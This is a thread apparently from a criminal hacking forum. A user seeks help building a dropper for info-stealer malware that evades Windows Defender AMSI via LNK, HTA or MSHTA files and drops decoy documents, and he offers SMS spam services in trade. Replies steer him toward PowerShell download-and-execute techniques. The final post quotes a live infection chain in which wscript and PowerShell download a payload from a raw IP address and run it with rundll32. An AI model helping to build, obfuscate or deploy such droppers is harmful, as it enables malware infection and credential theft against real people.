dropper for stiller

[crypt0]

Im trying to build out a dropper/downloader which will bypass WD AMSI via .LNK / HTA /MSHTA can anyone help with any powershell / vbs commands they may help in the execution of this
Ive also seen in the past it is also possible to drop a fake document also as a decoy agian any help in how to do this would be greatly apreciated or if you can point me to any repos that may help
Im new to this area of work and would rather learn than just pay for something that i dont understand as this is the only way we get forward
Thanks in advance

 

[V3SP3R]

Look here bro

https://xss.pro/threads/89089/post-620461


Also there's an option of using Javascript instead of .lnk

 

[Griff1n]

Well you can check my thread!

https://xss.pro/threads/88817/#post-620492

 

[crypt0]

Well you can check my thread!

https://xss.pro/threads/88817/#post-620492

thread clearly states im not looking to buy im looking to learn
TBH i was waiting for the influx of so called "szellers" in this field after i posted

 

[crypt0]

Look here bro

https://xss.pro/threads/89089/post-620461


Also there's an option of using Javascript to instead of .lnk

thanks for link to thread bro
As is tated im not looking for aservice but to learn so any input will be greatly apreciated Thanks in advance

 

[V3SP3R]

thanks for link to thread bro
As is tated im not looking for aservice but to learn so any input will be greatly apreciated Thanks in advance

Wish you the best in your learning journey. Play around with different powershell commands for download & execute. If you have a detected .lnk file you can use that to learn while building your knowledge.

 

[crypt0]

thanks for reply !!
Yes thats what i was asking if anyone can point me in theway of any decent repos or powershell commands for getting this job done
If you wouldnt mind as you seem to have a decent bit of knowledge in this area can you explain the infection chain
SMS spam is my area of expertise I can gladly help in this area if anyone needs in exchange for info on this subject

 

[V3SP3R]

Like I said read more about powershell commands like Invoke-Web Request. There are many references to powershell commands in the internet. Find what works for your use case.

 

[crypt0]

yes i spent a lot of time in the last few days researching this the area in getting stuck in mainly is the what is the best infection chain to use and once ive got a working chain the best way to obfuscate it
Im seeing a lot of these try chains out in the wild
wscript Jgvjewh.jspowershell $exophor = "http://109.172.45.79/PlL4mU/qlZuBeNP"foreach($Osmics in $exophor) {try { wget $Osmics -O $env:ProgramData\neighbourrundll32 $env:ProgramData\neighbour,vips;
Im guessing that the rest of the functions/strings are contained the in the .js file right ??